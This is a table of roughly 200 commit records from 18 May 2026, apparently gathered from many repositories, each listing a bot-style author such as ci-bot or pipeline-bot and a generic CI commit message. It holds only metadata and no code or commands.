| 3771 | zeroshotlabs/junkometer.com | a7e7ebf7b4c5 | auto-ci | [email protected] | 2026-05-18T13:30:44.000Z | build: improve ci performance |
| 3772 | andersonphiri/design-patterns-net5 | a7ed46a7b9fb | pipeline-bot | [email protected] | 2026-05-18T13:57:19.000Z | chore: optimize pipeline runtime |
| 3773 | JKS-sys/online-library-at-0001 | a7f3c461437e | ci-bot | [email protected] | 2026-05-18T14:20:19.000Z | chore: optimize pipeline runtime |
| 3774 | NMA2019/Portfolio_Pro | a807d3e58a2a | pipeline-bot | [email protected] | 2026-05-18T12:08:13.000Z | build: improve ci performance |
| 3775 | WIZnet-ioNIC/WIZnet-PICO-IPERF3-C | a8217eb29ff8 | ci-bot | [email protected] | 2026-05-18T16:25:50.000Z | fix: correct build workflow |
| 3776 | WIZnet-ioNIC/WIZnet-PICO-FREERTOS-C | a82f9ff717fd | build-bot | [email protected] | 2026-05-18T16:21:47.000Z | chore: optimize pipeline runtime |
| 3777 | Gopikrishna54321/test-action-1778963955789443201 | a8313863f946 | auto-ci | [email protected] | 2026-05-18T16:32:26.000Z | ci: add build optimization step |
| 3778 | charlinegrard-coder/MMI-Code | a831ced5006f | build-bot | [email protected] | 2026-05-18T15:54:30.000Z | ci: update build config |
| 3779 | amsoftmobile/amsoft-mobile | a835286685cc | build-bot | [email protected] | 2026-05-18T11:54:24.000Z | build: improve ci performance |
| 3780 | osamahkenawy/trasealla-backend | a8366bca857b | build-bot | [email protected] | 2026-05-18T15:17:46.000Z | chore: sync ci configuration |
| 3781 | ho-cyber/25005-website | a8546e92e15f | build-bot | [email protected] | 2026-05-18T17:29:56.000Z | chore: update ci/cd pipeline |
| 3782 | binkaiff/codveda-level2-task2-todo-app | a857c7629d4c | ci-bot | [email protected] | 2026-05-18T15:48:48.000Z | chore: optimize pipeline runtime |
| 3783 | ANDREWTENAJEROS/stqa-html5-storage | a85b43c23aa6 | build-bot | [email protected] | 2026-05-18T16:10:59.000Z | chore: sync ci configuration |
| 3784 | Connected-Energy-AI/morphic-ai-answer-engine-generative-ui | a863114473e5 | auto-ci | [email protected] | 2026-05-18T13:35:10.000Z | fix: correct build workflow |
| 3785 | thanu-george/fastapi-streamlit-starter | a86d0650212c | ci-bot | [email protected] | 2026-05-18T13:02:37.000Z | build: improve ci performance |
| 3786 | arpita009/my_portfolio | a86d9db2f8bb | build-bot | [email protected] | 2026-05-18T16:36:05.000Z | chore: optimize pipeline runtime |
| 3787 | kayosama007/ci-build-20260329-190041-8374 | a88ba5499d99 | auto-ci | [email protected] | 2026-05-18T14:24:55.000Z | chore: sync ci configuration |
| 3788 | kelvinsinsua/marketplace_vendor | a8964279d50d | build-bot | [email protected] | 2026-05-18T17:39:52.000Z | chore: sync ci configuration |
| 3789 | bishaldahal4777/python-jango | a89c69037106 | auto-ci | [email protected] | 2026-05-18T13:32:58.000Z | ci: add build optimization step |
| 3790 | vrct07/portifolio | a8a7d4cb3aa2 | auto-ci | [email protected] | 2026-05-18T14:25:27.000Z | fix: correct build workflow |
| 3791 | S-Abrar/Automatic-Indian-Sign-Language-Translator-ISL-master | a8abc2fc4741 | build-bot | [email protected] | 2026-05-18T12:56:07.000Z | chore: update ci/cd pipeline |
| 3792 | jamier2007/test-action-1778959304129725398 | a8bc40d9197f | auto-ci | [email protected] | 2026-05-18T13:31:14.000Z | fix: correct build workflow |
| 3793 | Grzzmine/test-action-1778959304041258649 | a8ce26523646 | build-bot | [email protected] | 2026-05-18T12:04:40.000Z | chore: optimize pipeline runtime |
| 3794 | AbhishekAnamala/CODTECH-Task2 | a8d88304063b | auto-ci | [email protected] | 2026-05-18T16:12:24.000Z | ci: add build optimization step |
| 3795 | codedecode25/Spring-demo | a8df439bfc93 | pipeline-bot | [email protected] | 2026-05-18T17:30:55.000Z | chore: optimize pipeline runtime |
| 3796 | pooooriya/veilani_bot | a8f207b0e254 | build-bot | [email protected] | 2026-05-18T12:55:01.000Z | build: improve ci performance |
| 3797 | cloudyape/Prime-Research | a8f3ed11dfb6 | auto-ci | [email protected] | 2026-05-18T15:47:25.000Z | chore: sync ci configuration |
| 3798 | phase23/waiverpass | a8f5065d6559 | ci-bot | [email protected] | 2026-05-18T11:43:49.000Z | ci: add build optimization step |
| 3799 | Ashwiin/LeetCode-0026 | a8fdf846ebf4 | auto-ci | [email protected] | 2026-05-18T16:47:37.000Z | chore: optimize pipeline runtime |
| 3800 | chat21/chat21-server | a91c061a55ef | auto-ci | [email protected] | 2026-05-18T12:51:01.000Z | ci: update build config |
| 3801 | GrupoEcoquintas/Wordpress-EQ | a925b216772a | auto-ci | [email protected] | 2026-05-18T14:26:41.000Z | ci: add build optimization step |
| 3802 | osamahkenawy/kafka-to-spreadsheet | a92a3120025c | pipeline-bot | [email protected] | 2026-05-18T15:19:28.000Z | fix: correct build workflow |
| 3803 | chitthushine/spacex-launches-data-pipeline | a9316c906131 | pipeline-bot | [email protected] | 2026-05-18T12:50:22.000Z | ci: add build optimization step |
| 3804 | julianarmando/Radio3hp-Desktop | a937533f021a | pipeline-bot | [email protected] | 2026-05-18T13:51:34.000Z | fix: correct build workflow |
| 3805 | Mostakim0978/LinearExaltedObject | a93a4c5da02b | ci-bot | [email protected] | 2026-05-18T11:43:45.000Z | fix: correct build workflow |
| 3806 | Piyush-Bansal9/Unsocially | a93d5d7ce802 | build-bot | [email protected] | 2026-05-18T12:05:04.000Z | ci: update build config |
| 3807 | Raysharr/mern | a950eb6e4af1 | auto-ci | [email protected] | 2026-05-18T12:34:29.000Z | chore: sync ci configuration |
| 3808 | deploy11/ncall | a965dc2db310 | ci-bot | [email protected] | 2026-05-18T11:52:03.000Z | ci: add build optimization step |
| 3809 | SaiDheeraj-19/PrepRank | a96b3d84a286 | auto-ci | [email protected] | 2026-05-18T15:50:33.000Z | chore: update ci/cd pipeline |
| 3810 | skolhustick/mdwnio | a9700627e733 | pipeline-bot | [email protected] | 2026-05-18T17:02:36.000Z | ci: add build optimization step |
| 3811 | KryptonZQ/gamewithunity | a975821cc142 | ci-bot | [email protected] | 2026-05-18T12:50:23.000Z | chore: update ci/cd pipeline |
| 3812 | cloudyape/theattarstudio | a97af70ebca4 | build-bot | [email protected] | 2026-05-18T15:43:48.000Z | chore: sync ci configuration |
| 3813 | guimmamanna/enterprise-quality-automation-framework | a9802f509905 | auto-ci | [email protected] | 2026-05-18T13:02:21.000Z | build: improve ci performance |
| 3814 | Princ3k/Revless-ios | a988d6a5f9e5 | build-bot | [email protected] | 2026-05-18T13:56:16.000Z | build: improve ci performance |
| 3815 | RameshRukshan/Parking-Assistance-System-with-Ultrasonic-Sensor-Arduino | a98b83e9d887 | build-bot | [email protected] | 2026-05-18T17:40:01.000Z | ci: add build optimization step |
| 3816 | Shillerx/CodeCraft5 | a9a2e134d495 | ci-bot | [email protected] | 2026-05-18T12:33:10.000Z | chore: optimize pipeline runtime |
| 3817 | PraTiK-2069/test-action-1778964630808777402 | a9adcc20b7e9 | auto-ci | [email protected] | 2026-05-18T16:41:27.000Z | fix: correct build workflow |
| 3818 | Akisan98/LearnWebhookTest | a9d9dec44a98 | build-bot | [email protected] | 2026-05-18T14:03:27.000Z | chore: optimize pipeline runtime |
| 3819 | ammadey7/gp1_argument | a9e6abc3f03e | ci-bot | [email protected] | 2026-05-18T13:12:57.000Z | fix: correct build workflow |
| 3820 | ANDREWTENAJEROS/quiz-constructor-accessor-mutator-extends | a9f32c14b7a9 | auto-ci | [email protected] | 2026-05-18T16:12:16.000Z | build: improve ci performance |
| 3821 | alexbuiac/IMDB-Clone | a9fc0c91c44b | build-bot | [email protected] | 2026-05-18T17:16:41.000Z | ci: add build optimization step |
| 3822 | nebink/c-project | aa00b131febe | auto-ci | [email protected] | 2026-05-18T12:17:59.000Z | ci: update build config |
| 3823 | Husam-AbuZina/instagram-final-project-gsg-main | aa0cb0fc5865 | build-bot | [email protected] | 2026-05-18T12:26:03.000Z | chore: optimize pipeline runtime |
| 3824 | deploy11/nodejsbot | aa13e4098dde | pipeline-bot | [email protected] | 2026-05-18T11:52:43.000Z | fix: correct build workflow |
| 3825 | roydellclarke/BreadFrute-Head | aa1d85aa420d | ci-bot | [email protected] | 2026-05-18T13:04:20.000Z | chore: sync ci configuration |
| 3826 | AmarKumarShaw/ayushi_m | aa2397cd2eb2 | auto-ci | [email protected] | 2026-05-18T12:16:18.000Z | fix: correct build workflow |
| 3827 | pranto2051/ma_-furniture_04 | aa285720f68f | build-bot | [email protected] | 2026-05-18T13:56:59.000Z | chore: optimize pipeline runtime |
| 3828 | ErezD1/test-action-1778997996741350301 | aa41f103a3db | pipeline-bot | [email protected] | 2026-05-18T12:25:55.000Z | chore: sync ci configuration |
| 3829 | namraVaidya/api_implementation | aa74ceb8e2a5 | ci-bot | [email protected] | 2026-05-18T13:38:20.000Z | fix: correct build workflow |
| 3830 | IsidurPaine/Socket | aa751e1ab035 | auto-ci | [email protected] | 2026-05-18T12:50:20.000Z | chore: update ci/cd pipeline |
| 3831 | musatekin/DeepLearning-Project | aa81fd2e48f4 | pipeline-bot | [email protected] | 2026-05-18T17:11:09.000Z | ci: add build optimization step |
| 3832 | HarshAgnihotri9/Music-Website | aa84679663e8 | auto-ci | [email protected] | 2026-05-18T12:19:25.000Z | ci: update build config |
| 3833 | S-Abrar/TruthX-Fake-news-detection- | aa96ffe4fbad | build-bot | [email protected] | 2026-05-18T12:56:03.000Z | chore: update ci/cd pipeline |
| 3834 | codehalic/codehalic-chat | aa9c9329a7dd | ci-bot | [email protected] | 2026-05-18T12:53:02.000Z | chore: sync ci configuration |
| 3835 | BryanAlexanderSantoso/KAnime | aab5205c1823 | pipeline-bot | [email protected] | 2026-05-18T13:42:09.000Z | ci: add build optimization step |
| 3836 | saksham-tech/aaps-assignment-1 | aab6f77e3ec7 | auto-ci | [email protected] | 2026-05-18T17:11:19.000Z | chore: optimize pipeline runtime |
| 3837 | jaff0040/test-action-1779119164987995511 | aabe9e0ca4c8 | ci-bot | [email protected] | 2026-05-18T16:57:48.000Z | ci: update build config |
| 3838 | omondijeff/tierdemo-deploy | aac600230791 | ci-bot | [email protected] | 2026-05-18T12:57:26.000Z | chore: update ci/cd pipeline |
| 3839 | AmarKumarShaw/bg-remover-app | aacc2d3fecec | pipeline-bot | [email protected] | 2026-05-18T12:13:01.000Z | ci: add build optimization step |
| 3840 | nucrasenaa/nextjs-learn | aacf0a66386b | auto-ci | [email protected] | 2026-05-18T14:03:13.000Z | chore: update ci/cd pipeline |
| 3841 | alexmagwe/url_shortener | aacfd327c29b | build-bot | [email protected] | 2026-05-18T13:00:12.000Z | chore: optimize pipeline runtime |
| 3842 | pranto2051/pranto2051 | aad7f29821b9 | build-bot | [email protected] | 2026-05-18T13:55:08.000Z | chore: optimize pipeline runtime |
| 3843 | tanfameng/gitDemo | aae4890680d1 | build-bot | [email protected] | 2026-05-18T13:26:52.000Z | build: improve ci performance |
| 3844 | KrishArora30-04/sales-us-dashboard | aae881aa7edc | build-bot | [email protected] | 2026-05-18T16:54:05.000Z | chore: sync ci configuration |
| 3845 | ammadey7/Scripts | aaef99b55f6c | auto-ci | [email protected] | 2026-05-18T13:12:14.000Z | build: improve ci performance |
| 3846 | danhoernchen/odin-signup-form | aaf81ba9009c | auto-ci | [email protected] | 2026-05-18T13:55:24.000Z | chore: optimize pipeline runtime |
| 3847 | onenarok777/time-scan-apis | ab0c9efaa3a8 | ci-bot | [email protected] | 2026-05-18T12:48:16.000Z | ci: update build config |
| 3848 | yashlad27/PDP_Group | ab0d04971f51 | build-bot | [email protected] | 2026-05-18T13:28:48.000Z | build: improve ci performance |
| 3849 | naveenJose24/jetpack-sample | ab15b5ff552b | pipeline-bot | [email protected] | 2026-05-18T13:50:37.000Z | fix: correct build workflow |
| 3850 | thecodinglive/ffmpeg-study | ab38c79c2629 | auto-ci | [email protected] | 2026-05-18T12:29:42.000Z | build: improve ci performance |
| 3851 | isaac372/ANalizadorcupJava | ab4103ada043 | build-bot | [email protected] | 2026-05-18T13:03:09.000Z | build: improve ci performance |
| 3852 | akash-guptaa/salwatvapp | ab417519e9c9 | pipeline-bot | [email protected] | 2026-05-18T16:07:49.000Z | fix: correct build workflow |
| 3853 | EnamulBokshi/nmppolymer-api | ab41b65a6745 | pipeline-bot | [email protected] | 2026-05-18T15:32:41.000Z | ci: update build config |
| 3854 | BrenoXFD/nutripass | ab58e68544e8 | auto-ci | [email protected] | 2026-05-18T15:32:44.000Z | build: improve ci performance |
| 3855 | HamzaElMkhantar/express-checkpoints | ab59d3df39a1 | pipeline-bot | [email protected] | 2026-05-18T17:13:04.000Z | ci: add build optimization step |
| 3856 | vrct07/to-do-list-2 | ab606ad646e7 | auto-ci | [email protected] | 2026-05-18T14:24:55.000Z | fix: correct build workflow |
| 3857 | revel-um/face_recognition_python | ab6932c33802 | auto-ci | [email protected] | 2026-05-18T12:13:07.000Z | build: improve ci performance |
| 3858 | kaanakboga/Advanced-Personal-Website | ab6f75074854 | pipeline-bot | [email protected] | 2026-05-18T13:33:55.000Z | build: improve ci performance |
| 3859 | JKS-sys/heyram-infrastructure-at-0-0-1 | ab758630b4ba | build-bot | [email protected] | 2026-05-18T14:22:08.000Z | chore: optimize pipeline runtime |
| 3860 | MoustafaElsaghier/Zomato | ab80cd273871 | build-bot | [email protected] | 2026-05-18T15:35:48.000Z | chore: update ci/cd pipeline |
| 3861 | HamzaElMkhantar/Cloud-Integration-Project | ab8fd2d3670b | ci-bot | [email protected] | 2026-05-18T17:26:29.000Z | chore: optimize pipeline runtime |
| 3862 | andersonphiri/simplebankingsystem | abba09458457 | build-bot | [email protected] | 2026-05-18T13:58:58.000Z | chore: sync ci configuration |
| 3863 | just-abdullah-dev/prop-config-store | abbd2a66ba72 | auto-ci | [email protected] | 2026-05-18T13:53:48.000Z | build: improve ci performance |
| 3864 | luo44881792/test-1775234108 | abceb378b5d5 | auto-ci | [email protected] | 2026-05-18T11:38:41.000Z | chore: optimize pipeline runtime |
| 3865 | BayoDavid24/mega-mail | abd3d0aa94e2 | ci-bot | [email protected] | 2026-05-18T13:07:29.000Z | ci: add build optimization step |
| 3866 | noushiFlex/monBlog | abf8562042ec | build-bot | [email protected] | 2026-05-18T17:42:27.000Z | ci: update build config |
| 3867 | bashenko/dotfiles | abffa88db9d6 | pipeline-bot | [email protected] | 2026-05-18T17:24:13.000Z | ci: update build config |
| 3868 | Siddhant23/ToDoAppKotlinMVVM | ac0db993b096 | pipeline-bot | [email protected] | 2026-05-18T16:58:17.000Z | ci: add build optimization step |
| 3869 | arj1211/puzzle-game | ac0e85632832 | auto-ci | [email protected] | 2026-05-18T15:41:02.000Z | fix: correct build workflow |
| 3870 | iriis-research/iriis-research.github.io | ac13f55cf2be | ci-bot | [email protected] | 2026-05-18T13:10:45.000Z | ci: add build optimization step |
| 3871 | batnano/test-action-1779116808540350216 | ac1b8065a45a | ci-bot | [email protected] | 2026-05-18T15:25:32.000Z | chore: sync ci configuration |
| 3872 | Salwa99/TDD-project | ac276a6f3db9 | auto-ci | [email protected] | 2026-05-18T12:27:49.000Z | chore: optimize pipeline runtime |
| 3873 | Fablelie/UnityPackage | ac399e3d1a38 | auto-ci | [email protected] | 2026-05-18T17:11:50.000Z | ci: update build config |
| 3874 | yashlad27/authwall_gateway | ac3a14e58b75 | pipeline-bot | [email protected] | 2026-05-18T13:25:44.000Z | fix: correct build workflow |
| 3875 | PrimalKyodon/CS-382 | ac4237725c6d | ci-bot | [email protected] | 2026-05-18T11:58:23.000Z | build: improve ci performance |
| 3876 | ConnectSiteForge/docs-pqigps | ac43272c9cf4 | build-bot | [email protected] | 2026-05-18T14:34:56.000Z | chore: sync ci configuration |
| 3877 | dbtjr1103/kmu-cloud-ml-2025 | ac4b6d831c02 | build-bot | [email protected] | 2026-05-18T16:16:23.000Z | chore: update ci/cd pipeline |
| 3878 | R-Dinesh-Kumar2004/Face-Recognition-Attendance-System | ac56ac6130b0 | ci-bot | [email protected] | 2026-05-18T14:08:52.000Z | ci: update build config |
| 3879 | Tiledesk/tiledesk-server | acac5a985465 | build-bot | [email protected] | 2026-05-18T12:50:25.000Z | ci: add build optimization step |
| 3880 | WIZnet-ioNIC/WIZnet-PICO-circuitpython-examples | acbc2103664d | ci-bot | [email protected] | 2026-05-18T16:28:41.000Z | chore: sync ci configuration |
| 3881 | nucrasenaa/gooxsoftV3 | acbd0ea56f93 | auto-ci | [email protected] | 2026-05-18T14:03:33.000Z | ci: add build optimization step |
| 3882 | umairabhatti786/Slogan | acbd79c482fe | ci-bot | [email protected] | 2026-05-18T13:08:06.000Z | chore: optimize pipeline runtime |
| 3883 | yashlad27/pokercpp | acc983fc4070 | ci-bot | [email protected] | 2026-05-18T13:24:40.000Z | chore: optimize pipeline runtime |
| 3884 | Husam-AbuZina/test-action-1778960691765323536 | acd66170c5fa | build-bot | [email protected] | 2026-05-18T12:10:22.000Z | ci: add build optimization step |
| 3885 | alexmagwe/coolwebs | acdca0b02d50 | ci-bot | [email protected] | 2026-05-18T12:58:18.000Z | ci: add build optimization step |
| 3886 | BryanAlexanderSantoso/api-laravel | ace5faf3d433 | build-bot | [email protected] | 2026-05-18T13:49:06.000Z | ci: add build optimization step |
| 3887 | abdel1452/My-Body-Tracker | acefb0e140d1 | pipeline-bot | [email protected] | 2026-05-18T11:59:56.000Z | chore: optimize pipeline runtime |
| 3888 | jparada78/react-gif-expert | aceff96338cc | pipeline-bot | [email protected] | 2026-05-18T16:17:10.000Z | build: improve ci performance |
| 3889 | kasumusof/coding-with-javier | acf1f9538cc7 | build-bot | [email protected] | 2026-05-18T12:50:02.000Z | chore: sync ci configuration |
| 3890 | naytanvieira/chat-sockt-angular | acf68cc32423 | ci-bot | [email protected] | 2026-05-18T15:13:39.000Z | chore: sync ci configuration |
| 3891 | dongyiqi/SimpleSocket | acfa3afe6851 | pipeline-bot | [email protected] | 2026-05-18T15:10:41.000Z | ci: add build optimization step |
| 3892 | MoustafaElsaghier/NTLBaking | ad09dcb07852 | pipeline-bot | [email protected] | 2026-05-18T15:38:52.000Z | build: improve ci performance |
| 3893 | prashant2024-max/do-hotels | ad21f5de1c96 | auto-ci | [email protected] | 2026-05-18T12:22:19.000Z | ci: add build optimization step |
| 3894 | varunvaghasiya11/Java_script_conditional_statment | ad22b7dcf004 | ci-bot | [email protected] | 2026-05-18T14:00:33.000Z | chore: optimize pipeline runtime |
| 3895 | ChanceDevelopment/kunyuan | ad29b76c3167 | auto-ci | [email protected] | 2026-05-18T12:44:59.000Z | build: improve ci performance |
| 3896 | Piyush-Bansal9/Nodebase-AI_SaaS_Workflow_Automation | ad32ca38eb5f | auto-ci | [email protected] | 2026-05-18T12:01:46.000Z | chore: sync ci configuration |
| 3897 | Owolabi5541/Portfolio | ad36e8759952 | pipeline-bot | [email protected] | 2026-05-18T14:02:39.000Z | ci: update build config |
| 3898 | Crux69/GeocodingSample | ad4d916763df | ci-bot | [email protected] | 2026-05-18T12:06:29.000Z | chore: sync ci configuration |
| 3899 | Sbongslany/my_internet_plugin | ad5e2b8036d1 | ci-bot | [email protected] | 2026-05-18T16:29:00.000Z | ci: add build optimization step |
| 3900 | ZunsodB/Valentine | ad63c7da5d24 | pipeline-bot | [email protected] | 2026-05-18T16:24:01.000Z | ci: update build config |
| 3901 | persian-tools/.github | ad6c009a4363 | ci-bot | [email protected] | 2026-05-18T12:53:02.000Z | build: improve ci performance |
| 3902 | Sahil-nandi/sample | ad706f571334 | build-bot | [email protected] | 2026-05-18T12:51:13.000Z | build: improve ci performance |
| 3903 | ConnectSiteForge/docs-i02jcb | ad7078ba52d7 | ci-bot | [email protected] | 2026-05-18T14:35:47.000Z | build: improve ci performance |
| 3904 | persian-tools/persian-mobile-datepicker | ad88451ed3d9 | pipeline-bot | [email protected] | 2026-05-18T12:53:09.000Z | build: improve ci performance |
| 3905 | AmarKumarShaw/json-sharing | ada7b02094f3 | pipeline-bot | [email protected] | 2026-05-18T12:12:48.000Z | chore: optimize pipeline runtime |
| 3906 | arj1211/arj1211.github.io | ada9bd84fb23 | ci-bot | [email protected] | 2026-05-18T15:40:14.000Z | ci: add build optimization step |
| 3907 | umairabhatti786/Readings | adab8a3a7be0 | ci-bot | [email protected] | 2026-05-18T12:55:34.000Z | build: improve ci performance |
| 3908 | Team-Bit2Byte/SilkRoute | adb44ee86448 | ci-bot | [email protected] | 2026-05-18T16:26:48.000Z | fix: correct build workflow |
| 3909 | MaybeBroken/ExcelPlanetConverter | adc3ad026503 | ci-bot | [email protected] | 2026-05-18T17:04:39.000Z | chore: update ci/cd pipeline |
| 3910 | pranto2051/Basic-Website-Design | adc4bd960709 | auto-ci | [email protected] | 2026-05-18T14:16:10.000Z | ci: add build optimization step |
| 3911 | R-Dinesh-Kumar2004/QuizApp | add4ea67b78e | auto-ci | [email protected] | 2026-05-18T14:08:18.000Z | chore: sync ci configuration |
| 3912 | umairabhatti786/RiderApp | add7a9902a4e | ci-bot | [email protected] | 2026-05-18T12:42:37.000Z | chore: sync ci configuration |
| 3913 | MaybeBroken/OP-Media-Player | adeec639dbc2 | build-bot | [email protected] | 2026-05-18T17:01:38.000Z | ci: add build optimization step |
| 3914 | mahbubur1rahman/test-action-1779100546946912358 | ae179faa0a31 | pipeline-bot | [email protected] | 2026-05-18T16:34:21.000Z | ci: update build config |
| 3915 | trixobird/class-validator-bug | ae2283fdc9d9 | pipeline-bot | [email protected] | 2026-05-18T14:44:44.000Z | build: improve ci performance |
| 3916 | CHESSComputing/SyncService | ae2eb644c410 | pipeline-bot | [email protected] | 2026-05-18T13:39:45.000Z | chore: sync ci configuration |
| 3917 | ansarex/diary | ae31ff3d6037 | ci-bot | [email protected] | 2026-05-18T16:10:17.000Z | fix: correct build workflow |
| 3918 | yashlad27/PDP-A2 | ae3e2c25e98c | pipeline-bot | [email protected] | 2026-05-18T13:29:16.000Z | chore: optimize pipeline runtime |
| 3919 | azimsidd/stackoverflow_mvvm_di | ae55f5814db8 | auto-ci | [email protected] | 2026-05-18T13:23:17.000Z | ci: update build config |
| 3920 | Wiznet/Hardware-Files-of-WIZnet | ae5d40c9228f | build-bot | [email protected] | 2026-05-18T16:05:33.000Z | build: improve ci performance |
| 3921 | moritzkrause/CodeDemos | ae6de889e184 | build-bot | [email protected] | 2026-05-18T12:40:53.000Z | build: improve ci performance |
| 3922 | kmucs-jinseon/2025-S-SWP1 | ae808f2d9a1c | ci-bot | [email protected] | 2026-05-18T12:48:19.000Z | chore: sync ci configuration |
| 3923 | VrajPatelK/Ideal-International | aea13dcfe3ec | pipeline-bot | [email protected] | 2026-05-18T12:44:59.000Z | chore: optimize pipeline runtime |
| 3924 | Manthankachhadiya/report-ganreter | aea4dab6f5b8 | pipeline-bot | [email protected] | 2026-05-18T16:16:36.000Z | ci: update build config |
| 3925 | jenish-prog/LIMUNA | aeb79160a64b | auto-ci | [email protected] | 2026-05-18T14:08:09.000Z | chore: sync ci configuration |
| 3926 | revel-um/Music1 | aecba8a5296e | pipeline-bot | [email protected] | 2026-05-18T12:13:21.000Z | fix: correct build workflow |
| 3927 | ConnectSiteForge/docs-we4box | aecbfd50aa8b | build-bot | [email protected] | 2026-05-18T14:36:18.000Z | chore: update ci/cd pipeline |
| 3928 | Ediekkhan/synaptiVerse | aee7040e8e18 | auto-ci | [email protected] | 2026-05-18T13:41:24.000Z | chore: update ci/cd pipeline |
| 3929 | pranto2051/Wifi-Deauther-01-File | af05c44a1c04 | pipeline-bot | [email protected] | 2026-05-18T14:16:23.000Z | chore: optimize pipeline runtime |
| 3930 | Hatem-Haj-Ismail/test-action-1778963955507255446 | af345263112a | ci-bot | [email protected] | 2026-05-18T12:04:30.000Z | build: improve ci performance |
| 3931 | Svenhunter323/admin-dashboard | af393d12275e | ci-bot | [email protected] | 2026-05-18T14:30:52.000Z | chore: optimize pipeline runtime |
| 3932 | prasiddhp10/DjangoProject | af41d2e62dea | auto-ci | [email protected] | 2026-05-18T12:39:51.000Z | chore: sync ci configuration |
| 3933 | Stephen-Adom/concert-rails-back-end | af533a26dc24 | auto-ci | [email protected] | 2026-05-18T12:23:22.000Z | chore: update ci/cd pipeline |
| 3934 | AdilameerAdi/clone | af59367f4615 | build-bot | [email protected] | 2026-05-18T12:37:02.000Z | ci: update build config |
| 3935 | cloudyape/testig | af5a25a5a95e | build-bot | [email protected] | 2026-05-18T15:48:06.000Z | chore: update ci/cd pipeline |
| 3936 | azimsidd/DSAusingJava | af5b9f4246dd | ci-bot | [email protected] | 2026-05-18T13:22:26.000Z | chore: update ci/cd pipeline |
| 3937 | sahidDev09/E-Mobile-Store | af5c9c48e2f7 | auto-ci | [email protected] | 2026-05-18T16:13:59.000Z | build: improve ci performance |
| 3938 | pooooriya/dvm | af6b8d91fa1f | auto-ci | [email protected] | 2026-05-18T12:53:40.000Z | chore: update ci/cd pipeline |
| 3939 | Asultop/AdaptCFGPackage | af6ba468ac05 | build-bot | [email protected] | 2026-05-18T12:26:52.000Z | ci: add build optimization step |
| 3940 | Davidf2004/iconic | af701cce453d | auto-ci | [email protected] | 2026-05-18T16:57:56.000Z | chore: optimize pipeline runtime |
| 3941 | cslant/blog-runner | af793fee201b | build-bot | [email protected] | 2026-05-18T16:35:03.000Z | ci: add build optimization step |
| 3942 | nnfuad/OpenCVBasics | af796fbe61a7 | build-bot | [email protected] | 2026-05-18T13:28:42.000Z | chore: update ci/cd pipeline |
| 3943 | LuciferVid/bookstore-workshop-assignment | af9d38c47a27 | pipeline-bot | [email protected] | 2026-05-18T12:05:47.000Z | build: improve ci performance |
| 3944 | Debbatisudheer/pure-functions | afa759cb9c7e | auto-ci | [email protected] | 2026-05-18T17:30:07.000Z | fix: correct build workflow |
| 3945 | c0der0jal/my1stProject | afb8c20a284b | build-bot | [email protected] | 2026-05-18T12:54:01.000Z | chore: sync ci configuration |
| 3946 | smit-sk/azure-project-01 | afbf85ea3757 | build-bot | [email protected] | 2026-05-18T16:12:19.000Z | ci: add build optimization step |
| 3947 | Srj-Love/JSON-Parsing | afc8e398e0e4 | pipeline-bot | [email protected] | 2026-05-18T12:57:59.000Z | fix: correct build workflow |
| 3948 | atb9210/SnipeDeal-Subito-MVP-Phyton | afd1b37f5250 | pipeline-bot | [email protected] | 2026-05-18T13:53:21.000Z | ci: add build optimization step |
| 3949 | vibzvaibhavi/Warehouse_Management_System | afe75ef5cdbc | pipeline-bot | [email protected] | 2026-05-18T16:36:05.000Z | ci: update build config |
| 3950 | kayosama007/ci-build-0047 | afe7ac85fe46 | build-bot | [email protected] | 2026-05-18T14:26:18.000Z | ci: update build config |
| 3951 | RookieProjects/Ikrontik-Shard | afff72402239 | ci-bot | [email protected] | 2026-05-18T16:27:25.000Z | ci: update build config |
| 3952 | MaximKabaev/stock-portfolio-watcher | b000e937944b | auto-ci | [email protected] | 2026-05-18T14:25:11.000Z | chore: sync ci configuration |
| 3953 | VietNamCombatZ/carRentalv2 | b00c88cd56ab | pipeline-bot | [email protected] | 2026-05-18T15:45:50.000Z | build: improve ci performance |
| 3954 | Godpixelthereal/PAL | b014e6fae78b | build-bot | [email protected] | 2026-05-18T14:07:42.000Z | ci: add build optimization step |
| 3955 | aj-techsoul/idscanner-vision | b01bfa035d14 | ci-bot | [email protected] | 2026-05-18T13:42:41.000Z | build: improve ci performance |
| 3956 | hayan6969/activus | b02844c3178f | build-bot | [email protected] | 2026-05-18T13:57:16.000Z | fix: correct build workflow |
| 3957 | kritikhatri/smart-ai-chatbot | b02d15af76be | build-bot | [email protected] | 2026-05-18T15:35:39.000Z | chore: update ci/cd pipeline |
| 3958 | arj1211/Electronics-Utils | b034d60d1bc8 | auto-ci | [email protected] | 2026-05-18T15:51:17.000Z | ci: update build config |
| 3959 | Harshit2510745/-transactions-concurrency-sql-Pactice-1 | b053dc2cbb94 | ci-bot | [email protected] | 2026-05-18T13:01:18.000Z | build: improve ci performance |
| 3960 | gioeste/flashloanbnb2 | b059dca6e7b9 | ci-bot | [email protected] | 2026-05-18T13:05:34.000Z | ci: add build optimization step |
| 3961 | Daphne-Prenot/NSSP | b05b85510522 | auto-ci | [email protected] | 2026-05-18T14:00:57.000Z | chore: sync ci configuration |
| 3962 | sagarofseas/Ednarex-Treding | b05e67c1880e | ci-bot | [email protected] | 2026-05-18T13:38:20.000Z | ci: add build optimization step |
| 3963 | zeroshotlabs/libphphi | b060276889b4 | auto-ci | [email protected] | 2026-05-18T13:36:10.000Z | fix: correct build workflow |
| 3964 | jaff0040/LEC-13 | b062b2b1d502 | build-bot | [email protected] | 2026-05-18T17:37:00.000Z | ci: add build optimization step |
| 3965 | husain-12/husain-12 | b07b140e8a9c | pipeline-bot | [email protected] | 2026-05-18T13:00:11.000Z | chore: sync ci configuration |
| 3966 | XinyiC23/jymmy | b07bb602dc94 | auto-ci | [email protected] | 2026-05-18T16:38:07.000Z | chore: optimize pipeline runtime |
| 3967 | danhoernchen/odin-calculator | b08759ed707c | build-bot | [email protected] | 2026-05-18T13:55:27.000Z | chore: sync ci configuration |
| 3968 | pooooriya/dvm | b08ce1e487f8 | auto-ci | [email protected] | 2026-05-18T12:53:31.000Z | chore: optimize pipeline runtime |
| 3969 | bishaldahal4777/test-action-1779106619321235913 | b090fb3a51e8 | ci-bot | [email protected] | 2026-05-18T13:27:38.000Z | chore: optimize pipeline runtime |
| 3970 | pranto2051/my_libery | b0920f60598a | ci-bot | [email protected] | 2026-05-18T14:14:20.000Z | build: improve ci performance |
| 3971 | akashcruz/clinical-booking-and-reviews | b09e8ad81f37 | auto-ci | [email protected] | 2026-05-18T13:05:37.000Z | fix: correct build workflow |
